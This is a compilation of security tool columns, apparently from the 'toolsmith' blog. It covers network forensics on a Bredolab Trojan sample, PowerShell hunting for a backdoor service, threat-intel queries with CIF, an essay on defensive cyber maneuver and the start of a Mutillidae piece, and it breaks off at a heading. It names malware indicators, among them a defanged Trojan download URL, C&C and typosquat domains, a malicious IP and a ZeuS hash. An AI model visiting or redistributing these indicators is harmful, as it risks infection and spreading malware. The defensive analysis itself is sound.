Installation is point-and-click simple. Accept defaults or modify installation paths as you see fit. You will need to register the Computer ID generated for the host on which you’re installing, as it is used as part of the license key. Provide a valid email address; you’ll be sent a link to activate your installation for first use.
Keep in mind that by default NetWitness Investigator does phone home for new updates and will reach out to the NetWitness web service to offer you the most recent FAQs, News, and Community posts on the Welcome page. If you prefer otherwise, select Edit, then Options, and uncheck Automatically Check for Updates as well as Allow Investigator to Reach Internet.
If you don’t have WinPcap installed you will be prompted to do so; WinPcap 4.1.1 is bundled with the installation package.
Under View be sure to enable the Capture Bar as it will present a Capture icon and Collection selector at the bottom of the NetWitness Investigator UI.
You can also pre-define the interface from which you’d like to capture via the Options menu as described above.

Using NetWitness Investigator

The NetWitness Investigator (NI) Welcome Page provides a useful FAQ; read it as you get underway.
NI allows you to either capture data directly from the host network interfaces, including wireless adapters, or import network captures from other sources; its use is built around Collections. The free version of NI doesn’t offer Remote Collections, as they are specific to retrieving data gathered by other NetWitness commercial offerings. That said, you can create Local Collections.
Ctrl + L will pull up the new Local Collection UI; you can also click Collection, then New Local Collection from the menu bar, or click the create icon on the Collection toolbar.
I called my collection bredolab (you’ll learn why shortly) and will refer to it hereafter.
Once you create a collection, right-click it, then connect to it.
You now have two options: capture or import.
Capture
To capture, use the Capture Bar; select the already-created Collection or create a new one by clicking the Capture icon first. Once you click the Capture icon, NI will capture network data until you click the Capture icon again to halt the process.
Import
Right-click the already-created Collection to add data via the Import Packets options.

Select a PCAP file from your local file system, and click Open.

I worked primarily with imported PCAPs, though testing NI’s capture capability proved successful. I did find that in resource-limited virtual environments capturing network traffic with NI causes fairly significant VM grind.
As I was testing NI in the toolsmith lab, a golden opportunity to put it through its paces presented itself via the SANS ISC Diary. The Lenovo support site had been discovered to be compromised and propagating the Bredolab Trojan via an embedded IFRAME. As I had literally just been to the Lenovo site to update my laptop BIOS (I had not experienced the malicious behavior), I was pleased with the near real-time relevance and the opportunity to check NI against a new sample. The CyberInsecure article called out the exact malware URL that the IFRAME pointed to (hxxp://volgo-marun.cn/pek/exe.exe), so I grabbed it immediately via my malware sandbox VM. After firing up Wireshark on my VM server, I executed exe.exe (great name) and captured the resulting traffic. I imported the resulting bredolab.pcap (email me if you’d like a copy) into NI and compared results against details provided in the Lenovo compromise article. While this is a really small PCAP, it serves well in exemplifying NI features.

Claim: The malware “receives commands from C&C server with domain sicha-linna8.com”
Validation: Check. Right out of the gate we can see sicha-linna8.com as part of the Collection Navigation view, under Hostname Aliases.

Bredolab sample collection navigation

Left-click the hostname alias result to drill into it.
Right-click it to evoke bonus functionality such as SANS IP History, SamSpade, and CentralOps.
Drilling into the Hostname Alias entry reduces the Service Type findings to just HTTP and DNS traffic, which is useful as they are the primary services of interest with this sample. As seen in Figure 2, we can drill further into the single referenced DNS session. The resulting Session view, using the Hybrid option, shows us both a thumbnail view and session details. Further Content options are presented in the lower pane with additional functionality such as, were it relevant, rebuilding instant messaging (IM) and audio, as well as mail and web content reconstruction. The Best Reconstruction option is tidy; it organizes the three packets of the DNS session into the two request packets (as hex) and the response from the server.

DNS session content
You can make use of Google Earth as well, if installed, but be sure to default your private IP addresses to your local latitude and longitude. As if we hadn’t already imagined or determined it so, sicha-linna8.com is attributed to the Russian Federation (RU).
Click the Google Earth icon in the Session view.
Satellite imagery does a fair job of bearing that out, although, unless I’m mistaken, Figure 4’s reference pointer looks to be more like China.

Google Earth view of DNS request domain location
Now, I’m just being silly here, but again NI justifies my being so with its capabilities.
As mentioned above, the malware “receives commands from C&C server”. Hmm, that sounds like a bot. Duh, ok Russ, prove it. Navigate back to the Collection summary via the URL window, scroll down to the Querystring reference and click [open]. See, I told you so.

Hello, I’m a bot
That would be the HTTP GET equivalent of calling home to the mothership and requesting mission orders. As if action=bot and action=report weren’t enough for you, the fact that the Filename reference in Figure 5 is also controller.php really helps you reach a reasonable conclusion.
By the way, Trend Micro’s Bredolab summary (not specific to this sample) will give a good understanding of its behavioral attributes, but there should be no surprises.

There are endless additional features, including the use of breadcrumbs to help you leave a trail as you navigate through large captures, excellent reporting capabilities, and the ability to export sessions to a file (PCAP, CSV, XML, HTML, etc.) or to a new or different collection.
If you click Help, you’ll be offered the 168-page NetWitness Investigator User Guide, which will do this tool far more justice than I have. Consider it required reading before going too far down the rabbit hole on your own.

In Conclusion

There’s much more that I could have covered for you regarding NetWitness Investigator had time and space allowed, but hopefully this effort will get you cracking with this tool if you haven’t already partaken.
NetWitness Investigator is really slick and I’m pleased enough with it to declare it a candidate for the 2010 Toolsmith Tool of the Year to be decided no later than January 2011.
Check it out for yourself and let me know what you think.
Cheers…until next month.

toolsmith: Security Investigations with PowerShell


Prerequisites
Windows, ideally Windows 7 or Windows Server 2008 R2, as PowerShell is native
There are 32-bit and 64-bit versions of PowerShell for Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008 as well.

Introduction
Windows power users have long sought strong fu at the command line. In the beginning, Bill said “Let there be shell.” And lo, there was command.com and cmd.exe. Then Jim said, there must be scripting support and automation, and thus the likes of Windows Script Host and WMIC were brought to light. But alas, there were challenges; no shell integration, no interoperability. Then unto thee was delivered the shell prophet Monad (see the Monad Manifesto), later renamed Windows PowerShell in 2006.
In a nutshell, PowerShell is powerful. Alright, enough of the PowerShell parable.
Really though, any sysadmin running modern Windows platforms is likely using or has used PowerShell. Full disclosure: I work for Microsoft. But before you write me off as just being a fan boy, hear me out. Aside from all the administrative horsepower PowerShell provides it also lends significant punch to security-related investigations as part of incident response and/or forensic reviews.
As you know, I always prefer to “ask the expert” when it comes to toolsmith topics so I sought counsel from Ed Wilson (Microsoft Scripting Guy) regarding security investigations with PowerShell.

“Using Windows PowerShell to aid in security forensics is a no-brainer. First of all, Windows PowerShell is installed by default beginning with Windows 7, so the tool is likely to already be available. Second, Windows PowerShell makes it extremely easy to collect the data you need to analyze. A very simple Windows PowerShell script (or a few Windows PowerShell commands) can dump the Windows logs, take a snapshot of running services and processes, and gather system time. In addition, the script can collect any other logs you wish. The above can be done in just a few lines of easily readable code. When Windows PowerShell remoting is enabled (enabled by default on Windows Server 2012) there is no difference between running a command on one or a thousand different systems.
The real power begins, however, when you decide to parse the collected data. A number of Windows PowerShell cmdlets make trolling through massive amounts of XML, CSV, or even unstructured text a breeze. Whether you are parsing an offline Windows event log, a firewall log, or even a syslog gathered from a remote Unix machine the process remains the same. In short Windows PowerShell is the one tool you do not want to leave home (even virtually) without.” 

I pitch a straight fastball right in Ed’s wheelhouse and he drives it out of the park for me.
We’ll take on both of these scenarios as described by Ed:
·         Using PowerShell to dump Windows logs, assess running services, processes, and gather other useful system data.
·         Using PowerShell to parse collected data
In a case of shameless self-promotion, I want to call out the benefits of tools that aid in culling evil from logs as described above. My recently posted SANS Reading Room paper for my GCIA Gold research effort, Evil Through The Lens of Web Logs, discusses a number of tools to conduct such parsing activity but fails to mention PowerShell. This is my chance to correct that shortcoming.

Using PowerShell

There are endless online PowerShell resources via the likes of TechNet, MSDN, CodePlex, and SANS-related content. Also check out Adam Bell’s great list on Lead, Follow, or Move. Rather than rehash such content, I’ll instead walk through an investigation using cmdlets and scripts that are directly relevant to the cause. Do remember that get-help from the PowerShell prompt is definitely your friend.
Caveat: I do not lay claim to any of the strings or commands included hereafter; they are mimicked and modified from the above-mentioned resources or yanked right from Get-Help. This work is neither unique nor particularly creative. It is instead intended to help you recognize why PowerShell is so incredibly useful. To those true aficionados who swiftly recognize how much detail I’m leaving out, feel free to share your feedback and I’ll add it to the related blog post and/or accept comments.
Imagine a malicious person has created a backdoor on a Windows system using tini, has renamed tini to a trusted file name, created a service to ensure that it always runs, and has changed the listening port to 31337 (original, I know). I’m operating from the premise that we already know the basic gist of the attacker activity and will focus much more on how to discover it with PowerShell. So, what PowerShell juju can we utilize to rebuild the trail of malfeasance?
First, fire up a PowerShell prompt: Start | Programs | Accessories | Windows PowerShell, followed by your preferred PowerShell (x86 or 64-bit) or the Integrated Scripting Environment (ISE). Note: when you bring PowerShell scripts onto your system that have been created by other users, you may need to check the script execution policy. By default, unsigned PS1 files are prevented from execution given the inherent risk to the system as untrusted. As long as you are cognizant of this risk, you can do the following, in order, from the PowerShell prompt.
1)  Get-ExecutionPolicy
2)  Set-ExecutionPolicy <policy>, where policy is one of four options:
a.       Restricted – the default execution policy; doesn’t run scripts, interactive only
b.      AllSigned – runs scripts; scripts and configuration files must be signed by a trusted publisher
c.       RemoteSigned – like AllSigned, but only for scripts downloaded via apps such as IE and Outlook
d.      Unrestricted – goes without saying
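For example, to check the current policy and then relax it just enough to run locally created scripts while still requiring signatures on downloaded ones (RemoteSigned is a common choice; pick per your own risk tolerance):

```
Get-ExecutionPolicy
Set-ExecutionPolicy RemoteSigned
```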

Let’s start with running services. You have reason to believe that the attacker’s backdoor is running as a known service name. Begin with Get-Service. Results are a little busy, so let’s narrow it down. Get-Service | Where-Object {$_.status -eq "running"} thins the crowd a bit by presenting only running services, but still nothing leaps right out. Sometimes the service description, or lack thereof, is revealing. There is no parameter defined via Get-Service to pull a service description, but it can be done via get-wmiobject win32_service | format-list Name, Description. The result is again busy, but I found my culprit as seen in Figure 1.

Figure 1: Service description gone wild
Now that we know the name of our faux service in this imaginary scenario, let’s explore possibly related processes with Get-Process | Out-GridView. This will spawn a second window with a conveniently interactive table view of the results. If we operate on the premise that a malicious process named TapiSrv might be in play, we can filter the grid view or we can drill in for it specifically with Get-Process TapiSrv as seen in Figure 2.

Figure 2: Malicious process
Let’s determine the TapiSrv file information and process owner. Get-Process TapiSrv –fileversioninfo tells us that TapiSrv resides in C:\tmp\TapiSrv.exe. Helpful, but wait, there’s more. (get-wmiobject win32_process | where{$_.ProcessName -eq 'TapiSrv.exe'}).getowner() | Select -property domain, user will tell us that I am he who propagates the evil, and write-host ([WMI]'').ConvertToDateTime((Get-WmiObject win32_process | where{$_.ProcessName -eq 'TapiSrv.exe'}).creationdate) will tell us the date and time I created it, as seen in Figure 3 (no, you do not get to see my domain name).
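Consolidated, the hunt so far looks like this (TapiSrv/TapiSrv.exe is the malicious name from this contrived scenario; substitute your own suspect service or process):

```powershell
# Running services only
Get-Service | Where-Object {$_.Status -eq "running"}

# Service names with descriptions (odd or missing descriptions stand out)
Get-WmiObject win32_service | Format-List Name, Description

# File path and version info for the suspect process
Get-Process TapiSrv -FileVersionInfo

# Owner of the suspect process
(Get-WmiObject win32_process |
    Where-Object {$_.ProcessName -eq 'TapiSrv.exe'}).GetOwner() |
    Select-Object -Property Domain, User

# Creation date and time of the suspect process
Write-Host ([WMI]'').ConvertToDateTime(
    (Get-WmiObject win32_process |
        Where-Object {$_.ProcessName -eq 'TapiSrv.exe'}).CreationDate)
```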

Figure 3: Process owner, creation date & time
The Get-Member cmdlet will help you determine which properties and methods are available to you; the likes of get-wmiobject win32_process | get-member told us that getowner, ConvertToDateTime, and creationdate were all available to us via get-wmiobject.

Figure 2 gave us something useful to explore further in the Id column, also known as the PID.
We can take information such as 9512 and throw Microsoft MVP Shay Levy’s Get-NetworkStatistics at it. When you want to add PowerShell modules such as Shay’s that aren’t native you can use import-module as follows after saving the code from your preferred resource as a PSM1 file:
import-module -name D:\tools\powershell\Get-NetworkStatistics.psm1 –verbose
Thereafter, Get-NetworkStatistics will simply be available on demand. Issuing Get-NetworkStatistics | where{$_.PID -eq '9512'} | format-table reveals all our suspicions and closes the loop as seen in Figure 4.

Figure 4: Mapping PID to port and process
TapiSrv is PID 9512 and listening on port 31337. There’s the evil backdoor.

Ed also described using PowerShell for log analysis. In the above-mentioned Evil Through The Lens of Web Logs research paper, I used Log Parser-related tools. Early stages of this research were also included in the April 2012 toolsmith column on Log Parser Lizard. Can one conduct similar activity without Log Parser via PowerShell? Of course. Tim Medin, of CommandLine Kung Fu (one of my absolute favorite blogs), wrote the sweet little PowerShell IIS Log Objectifier. Saved as a script or modularized, Tim’s code allows you to search by common IIS log field identifiers such as UriStem, UriQuery, UserAgent, and Win32Status. Utilizing the same log sample analyzed for the research paper, as well as similar principles, I set a PowerShell query using Tim’s script to identify log entries with 500 status codes from a specific SourceIp as an example. Imagine we have reason to suspect that SourceIp of a SQL injection attack. The query .\objectify.ps1 $log | where{$_.Win32Status -eq '500' -and $_.SourceIp -eq '78.46.28.97'} resulted in Figure 5.

Figure 5: IIS log objectified via PowerShell
As you can see, 78.46.28.97 made an attempt to inject a HEX-obfuscated DECLARE statement into the victim application.

The possibilities are endless. I didn’t even touch the concepts of PowerShell remoting or running PowerShell cmdlets at scale. Did I mention the possibilities are endless? Hopefully, this brief synopsis whets your appetite.

In Conclusion

So much data, not enough time or word space. There is clearly so much that can be done with Windows PowerShell. The last resource I’ll share with you may become your PowerShell dashboard: A Task-Based Guide to Windows PowerShell Cmdlets. This resource will send you right down the rabbit hole as you further explore what we’ve started here. No reason not to head there now. Much thanks to Ed Wilson for supporting this exploration.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Ed Wilson (The Scripting Guy) for content and endless insight on PowerShell.



toolsmith: Collective Intelligence Framework






Prerequisites
Linux for server, stable on Debian Lenny and Squeeze, and Ubuntu v10
Perl for client (stable), Python client currently unstable

Introduction

As is often the case when plumbing the depths of my feed reader or the Dragon News Bytes mailing list, I found toolsmith gold. Kyle Maxwell’s Introduction to the Collective Intelligence Framework (CIF) lit up on my radar screen. CIF parses data from sources such as ZeuS and SpyEye Tracker, Malware Domains, Spamhaus, Shadowserver, Dragon Research Group, and others. The disparate data is then normalized into a repository that allows chronological threat intelligence gathering. Kyle’s article is an excellent starting point that you should definitely read, but I wanted to hear more from Wes Young, the CIF developer, who kindly filled me in with some background and a look forward. Wes is a Principal Security Engineer for REN-ISAC, whose mission is to aid and promote cyber security operational protection and response within the higher education and research (R&E) communities. As such, the tenor of his feedback makes all the more sense.
The CIF project has been an interesting experiment for us. When we first decided to transition the core components from incubation in a private trust-based community, to a more traditional open-source community model, it was merely to better support our existing community. We figured, if things were open-source, our community would have an easier time replicating our tools and processes to fit their own needs internally. If others outside the educational space benefited from that (private sector, government sector, etc), then that'd be the icing on the cake.
Years later, we discovered that ratio has nearly inverted itself. Now the CIF community has become lopsided, with the majority of users being from the international public and private spaces. Furthermore, the contribution in terms of testing, bug-fixes, documentation contributions and [more importantly] the word-of-mouth endorsements has driven CIF to become its own living organism. The demonstrated value it has created for threat analysts, who have traditionally had to beg-borrow-and-steal their own intelligence, has become immeasurable in relation to the minor investment of adoption.
As this project's momentum has given it a life all its own, future roadmaps will build off its current success. The ultimate goal of the CIF project is to create a uniform presence of your intelligence, somewhere you control. It'll read your blogs, your sandboxes, and yes, even your email (if you allow it), correlating and digging out threat information that's been traditionally locked in plain, wiki-fied or semi-formatted text. It has enabled organizations to defend their networks with up to the second intelligence from traditional data-sources as well as their peers. While traditional SEMs enable analysts to search their data, CIF enables your data to adapt your network, seamlessly and on the fly. It's your own personal Skynet. :)

Readers may enjoy Wes’ recent interview on the genesis of CIF, available as a FIRST 2012 podcast.
You may also wish to take a close look at Martin Holste’s integration of CIF with his Enterprise Log Search and Archive (ELSA) solution, a centralized syslog framework. Martin has utilized the Sphinx full-text search engine to create accelerated query functionality and a full web front end.

Installing CIF

The documentation found on the CIF wiki should be considered “must read” from top to bottom before proceeding. I won’t repeat what’s already been said (Kyle’s article has some installation pointers too), but I went through the process a couple of times to get it right, so I’ll share my experience. There are a number of elements to consider if implementing CIF in a production capacity. While I installed a test instance on insignificant hardware running Debian Squeeze, if you have a 64-bit system with 8GB of RAM or more and a minimum of four cores with drive space to grow into, definitely use it for CIF. If you can also install a fresh OS, pay special attention to your disk layout while configuring partition mapping during the Logical Volume Manager (LVM) setup. Also follow the postgres database configuration steps closely if working from a fresh install. You’ll be changing ident sameuser to trust in pg_hba.conf for socket connections. On weak little systems such as my test server, Kyle’s suggestion to update work_mem to 512MB and checkpoint_segments to 32 in postgresql.conf is a good one. The BIND setup is quite straightforward, but again, per Kyle’s feedback, make sure your forwarder IP addresses in /etc/resolv.conf match those you configure in /etc/bind/named.conf.options.
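For reference, the postgresql.conf tuning described above amounts to these two lines (the pg_hba.conf change is simply swapping the ident sameuser method for trust on the local socket entries; exact line positions vary by postgres version):

```
# postgresql.conf (Kyle's suggested tuning for resource-limited systems)
work_mem = 512MB
checkpoint_segments = 32
```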
From there, the install steps on the wiki can be followed verbatim. During the Load Data phase of configuration you may run into an XML parsing issue. After executing time /opt/cif/bin/cif_crontool -f -d && /opt/cif/bin/cif_crontool -d -p daily && /opt/cif/bin/cif_crontool -d -p hourly you may receive an error. The cif_crontool script is similar to cron, as I hope you’ve sagely intuited for yourself, in that it traverses the CIF configuration files and calls cif_feedparser based on the configs. The error, :170937: parser error : Sequence ']]>' not allowed in content, crops up when cif_crontool attempts to parse the cleanmx feed definition in /opt/cif/etc/misc.cfg. You can resolve this by simply commenting out that definition. Wes is reaching out to clean-mx.de to get this fixed; right now there is no option other than to comment out the feed.
To install a client you need only follow the Client Setup steps, and in your ~/.cif file apply the apikey that you created during the server install as described in CIF Config. Don't forget to configure .cif to generate feed as also described in this section.
A final installation note: if you don't feel like spending the time to do your own build, you have the option to utilize a preconfigured Amazon EC2 instance (limited disk space, not production-ready).

Using CIF

Per the Server Install, you should set the following up as a cron job, but for manual reference, if you wish to update your data at random intervals, run the following as sudo su - cif:
1)  PATH=/bin:/usr/local/bin:/opt/cif/bin
2)      Pull feed data:
a.  cif_crontool -p daily -T low
b.  cif_crontool -p hourly -T low
3)      Crunch the data: cif_analytic -d -t 16 -m 2500 (you can raise -t and -m on beefier systems, but doing so may grind a weaker system down)
4)      Update the feeds: cif_feeds
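The manual steps above translate naturally into the cif user's crontab; a sketch (the schedule below is my assumption, adjust to taste):

```
# crontab for the cif user (schedule is illustrative)
PATH=/bin:/usr/local/bin:/opt/cif/bin
# pull hourly feeds
5 * * * *  cif_crontool -p hourly -T low
# pull daily feeds, crunch the data, then update the feeds
30 0 * * * cif_crontool -p daily -T low && cif_analytic -d -t 16 -m 2500 && cif_feeds
```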
You can run cif from the command line; cif -h will give you all the options, and cif -q <query>, where the query string is an IP, URL, domain, etc., will get you started. Pay special attention to the -p parameter as it helps you define output formats such as HTML or Snort.
I immediately installed the Firefox CIF toolbar; you'll find details on the wiki under Client | Toolbars | Firefox. It makes queries via the browser, leveraging the API, a no-brainer. See WebAPI on the wiki under API. Screenshots included hereafter are of CIF usage via this interface (easier than manually populating query URLs).
There are a number of client examples available on the wiki, but I'm always one to throw real-world scenarios at the tool du jour. As ZeuS developers continue to "innovate" and produce modules such as the recently discovered two-factor authentication bypass, ZeuS continues to see increased usage by cybercriminals. In what is likely a common scenario, an end user on the network you try desperately to protect has called you to say that they tried to update Firefox via a link "someone sent them" but it "didn't look right" and that they were worried "something was wrong." You run netstat -ano on their system and see a suspicious connection, specifically 193.106.31.68. Ruh-roh, Rastro, that IP lives in the Ukraine. Go figure. What does Master Cifu say? Figure 1 fills us in.

FIGURE 1: CIF says “here be dragons”
I love mazilla-update.com, bad guy squatter genius. You need only web search ASN 49335 to learn that NCONNECT-AS Navitel Rusconnect Ltd is not a good neighborhood for your end user to be playing in. Better yet, cif –q AS49335 at the command line or drop AS49335 in the Firefox search box.
Figure 2 is a case in point, Navitel Rusconnect Ltd is definitely the wrong side of the tracks.

FIGURE 2: Can I catch a bus out of here?
 ZeuS configs and binaries, SpyEye, stolen credit card gateway, oh my.
This is a good time for a quick overview of taxonomy. Per the wiki, severity equates to seriousness, confidence denotes faith in the observation, and impact is a profile for badness (ZeuS, botnet, etc.).
Our above-mentioned user does show mazilla-update.com in their browser history; let's query it via CIF.
Figure 3 further validates suspicions.

FIGURE 3: Mazilla <> Mozilla
 You quickly discern that your end user downloaded bt.exe from mazilla-update.com. You take a quick md5sum of the binary and drop the hash in the CIF search box. 756447e177fc3cc39912797b7ecb2f92 bears instant fruit as seen in Figure 4.
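If you'd rather script the hashing step than shell out to md5sum, a minimal Python sketch (the bt.exe file name is from the scenario above):

```python
import hashlib

def md5_of_file(path, chunk_size=8192):
    """Return the hex MD5 digest of a file, reading in chunks so
    large binaries don't have to fit in memory."""
    digest = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

# print(md5_of_file("bt.exe"))  # drop the result in the CIF search box
```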

FIGURE 4: CIF hash search
 Yep, looks like your end user might have gotten himself some ZeuS action.
With a resource such as CIF at your fingertips you should be able to quickly envision value added when using a DNS sinkhole (hello 127.0.0.1) or DNS-BH from malwaredomains.com where you serve up fake replies to any request for the likes of mazilla-update.com. Bonus! Beefy server for CIF: $2499. CIF licensing: $0. Bad guy fail? Priceless.
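In BIND, the DNS-BH approach boils down to declaring yourself authoritative for the bad domain and answering from a local zone file that resolves everything to 127.0.0.1; a named.conf fragment in the malwaredomains.com style (the zone file path is an assumption):

```
// named.conf fragment: answer authoritatively for the bad domain
// with a local zone file that resolves everything to 127.0.0.1
zone "mazilla-update.com" {
    type master;
    file "/etc/bind/db.blockeddomain";
};
```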

In Conclusion

Check out the Idea List in the CIF Projects Lab; there is some excellent work to be done, including a VMware appliance, further Snort integration, a VirusTotal analytic, and others. This project, like so many others we've discussed in toolsmith, grows and prospers with your feedback and contributions. Please consider participating by joining the CIF Google Group and jumping in. You'll also want to check out the DFIR Journal's CIF discussions, including integration with ArcSight, as well as EyeIS's CIF incorporation with Splunk. These are the same folks who have brought us Security Onion 1.0 for Splunk, so I'm imagining all the possibilities for integration. Get busy with CIF, folks. It's a work in progress but a damned good one at that.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Wes Young, CIF developer, Principal Security Engineer, REN-ISAC

MORPHINATOR & cyber maneuver as a defensive tactic

In June I read an outstanding paper from MAJ Scott Applegate, US Army, entitled The Principle of Maneuver in Cyber Operations, written as part of his work at George Mason University.
Then yesterday, I spotted a headline indicating that the US Army has awarded a contract to Raytheon to develop technology for Morphing Network Assets to Restrict Adversarial Reconnaissance, or MORPHINATOR.
Aside from boasting what might be the greatest acronym of all time (take that, APT), MORPHINATOR represents a defensive tactic well worthy of consideration in the private sector as well. While the Raytheon article is basically just a press release, I strongly advocate reading MAJ Applegate's paper at your earliest convenience. I will restate the principles for you here with the understanding that these are, for me, the highlights of this excellent research as you might consider them for private sector use, and that they are to be entirely attributed to MAJ Applegate.
First, understand that the United States Military describes the concept of maneuver as "the disposition of forces to conduct operations by securing positional advantages before and or during combat operations."
MAJ Applegate proposes that the principles of maneuver as defined above require a significant amount of rethinking when applied to the virtual realm that constitutes cyberspace. "The methods and processes employed to attack and defend information resources in cyberspace constitute maneuver as they are undertaken to give one actor a competitive advantage over another."
While cyber maneuver as described in this paper includes elements of offensive and defensive tactics, I think it most reasonable to explore defensive tactics as the primary mission when applied to the private sector.
While I privately and cautiously advocate active defense (offensive reaction to an attack) I'm not aware of too many corporate entities who readily embrace direct or overt offensive tactics.
The paper indicates that: "Cyber maneuver leverages positioning in the cyberspace domain to disrupt, deny, degrade, destroy, or manipulate computing and information resources. It is used to apply force, deny operation of or gain access to key information stores or strategically valuable systems." While this reads as a more offense-oriented statement, carry forward disrupt, deny, degrade, and manipulate to a defensive mindset.
Applying parts of MAJ Applegate's characteristics of cyber maneuver to defensive tactics would include speed, operational reach, dynamic evolution, and non-serial and distributed maneuver. Consider these in the context of private sector networks while reviewing direct quotes from the paper:
  • Speed: "Actions in cyberspace can be virtually instantaneous, happening at machine speeds."
  • Operational Reach: "Reach in cyber operations tends to be limited by the scale of maneuver and the ability of an element to shield its actions from enemy observation, detection and reaction."
  • Dynamic evolution: "Recent years have seen rise to heavy use of web based applications, cloud computing, smart phones, and converging technologies. This ongoing evolution leads to constant changes in tactics, techniques and procedures used by both attackers and defenders in cyberspace."
  • Non-serial and distributed: "Maneuver in cyberspace allows attackers and defenders to simultaneously conduct actions across multiple systems at multiple levels of warfare. For defenders, this can mean hardening multiple systems simultaneously when new threats are discovered, killing multiple access points during attacks, collecting and correlating data from multiple sensors in parallel or other defensive actions."

Incorporating the above characteristics as part of defensive tactics for the private sector does not negate the need to fully understand and defend against the additional characteristics found in the research, including access & control, stealth & limited attribution, and rapid concentration. Liken access & control here to a "forward base" concept allowing attackers "to move the point of attack forward." Stealth & limited attribution clarifies that while action in cyberspace is "observable," most actions are not observed in a meaningful way. Think of this, in all seriousness, as "what you don't know will kill you." Rapid concentration represents the mass effect of botnets and DDoS attacks and the ease with which they're deployed in cyberspace. As defenders we must be entirely cognizant of these elements and ensure agility in our response to the threats they represent.

Now to close the loop (analogy intended, see the paper's reference to an OODA (Observe-Orient-Decide-Act) loop) as it pertains to defensive tactics. The Principle of Maneuver in Cyber Operations offers four Basic Forms of Defensive Cyber Maneuver, three of which directly apply to private sector network operations.
  1. Perimeter Defense & Defense in Depth: Well known, well discussed, but not always well-done. "While defense in depth is a more effective strategy than a line defense, both these defensive formations suffer from the fact that they are fixed targets with relatively static defenses which an enemy can spend time and resources probing for vulnerabilities with little or no threat of retaliation."
  2. Moving Target Defense: "This form of defensive maneuver uses technical mechanisms to constantly shift certain aspects of targeted systems to make it much more difficult for an attacker to be able to identify, target and successfully attack a target." This can be system level address space layout randomization (ASLR) or constantly moving virtual resources in cloud-based infrastructure.
  3. Deceptive Defense: "The use of these types of systems (honeypots) can allow a defender to regain the initiative by stalling an attack, giving the defender time to gather information on the attack methodology and then adjusting other defensive systems to account for the attacker’s tactics, techniques and procedures."
Drawing from part of MAJ Applegate's conclusion, when considering the principles described herein, "while maneuver in cyberspace is uniquely different than its kinetic counterparts, its objective remains the same, to gain a position of advantage over a competitor and to leverage that position for decisive success. It is therefore important to continue to study and define the evolving principle of maneuver in cyberspace to ensure the success of operations in this new warfighting domain."
I contend this is not a war pending, but a war upon us.
 While The Principle of Maneuver in Cyber Operations discusses this declaration specific to military operations, we are well advised to consider this precision of message in the private sector. GEN Keith Alexander, U.S. Cyber Command chief and the director of the National Security Agency, was recently quoted as saying that the loss of intellectual property due to cyber attacks amounts to the “greatest transfer of wealth in human history.” GEN Alexander went on to say "What I’m concerned about is the transition from disruptive to destructive attacks and I think that’s coming. We have to be ready for that."
Private sector and military resources alike need to think in these terms and act decisively. Cyber maneuver tactics offer intriguing options to be certain.
Use MAJ Applegate's fine work as reference material to perpetuate this conversation, and may the MORPHINATOR be with you.

toolsmith: NOWASP Mutillidae





Prerequisites
XAMPP is most convenient
NOWASP can be configured to run on Linux, Mac, and Windows

Introduction
I’m writing this month’s column fresh on the heels of presenting OWASP Top 10 Tools and Tactics for a SANS @Night event at the SANSFIRE 2012 conference in Washington, DC. A quick shout out to my fellow Internet Storm Center handlers whom I met there, along with all the excellent folks I met while attending the event. During the presentation I used Damn Vulnerable Web Application (DVWA) as a vulnerable test bed against which I demonstrated a number of web application assessment tools. Having been a longtime OWASP WebGoat user for such purposes, I had recently learned of DVWA from a great article on the PenTest Laboratory site entitled 10 Vulnerable Web Applications You Can Play With. As one who likens himself to a dog or a crow with AADD ("Look! Squirrel! Shiny object!"), I literally read the article only enough to learn about DVWA, ran down that rabbit hole, and never looked back. There are of course other excellent resources in the article, and it is with a red face and a sense of irony that I can tell you the author of the second vulnerable web application on the list was in the audience for the above-mentioned presentation. Jeremy Druin was extremely gracious and patiently waited until my presentation was over to tell me about his NOWASP Mutillidae. Had I only read that article past the first paragraph. Ah well, never too late to make amends. Jeremy’s timing was impeccable and fortuitous as there I was in search of this month’s topic. I immediately recruited him and asked for the requisite rundown on his creation.
"Mutillidae 2.x started with the idea to add "levels" to Mutillidae 1.x (created by Adrian Irongeek Crenshaw) with the idea that "level 0" would have no protection and "level 5" would have maximum protection. It was later discovered Mutillidae 1.x could not be easily upgraded and the project was rewritten and released in a separate fork. (Version 1.x is still available.). Once the Mutillidae 2.x fork was launched, several new vulnerabilities were added such that all OWASP 2007 and 2010 vulnerabilities were represented along with several others such as cross-frame scripting, forms-caching, information leakage via comments and html5 web-storage takeover.
Additional functionality was added to support CTF (capture the flag) contests, such as a page which automatically captures and logs all cookies, get, and post parameters of any user that "visits". A second page displays all captured data along with the user's IP address and the time of the capture. Based on feedback from users, the "hints" functionality was greatly expanded by making three levels of hints with increasing verbosity, adding several hundred extra hints including source code, and having "bubbles" pop up in critically vulnerable areas when the user hovers over a particularly good target (i.e. a vulnerable input field)."

Jeremy also pointed out that video tutorials have been posted to the webpwnized YouTube Channel detailing how to use tools and exploit the system. There are dozens of videos showing how to use Burp Suite, w3af, and netcat along with several videos dedicated to exploits such as SQL injection, cross-site scripting, html-5 web storage alteration, and command injection. New video posts as well as new release notices for Mutillidae are tweeted to @webpwnized.

Installing NOWASP Mutillidae
If you choose to install NOWASP on a LAMP or XAMPP stack and are having database connectivity issues, note that NOWASP is configured for root with a blank password to connect to MySQL. You’ll need to provide the correct settings to connect to your MySQL instance on line 16 in /mutillidae/classes/MySQLHandler.php and line 11 in /mutillidae/config.inc. It’s already properly configured if you choose to utilize the Samurai WTF distribution, so no need to change it there.
I built Mutillidae from scratch quite easily on an Ubuntu 11.04 virtual machine, and once I made the above-mentioned configuration updates, Mutillidae was immediately functional.

Using NOWASP Mutillidae

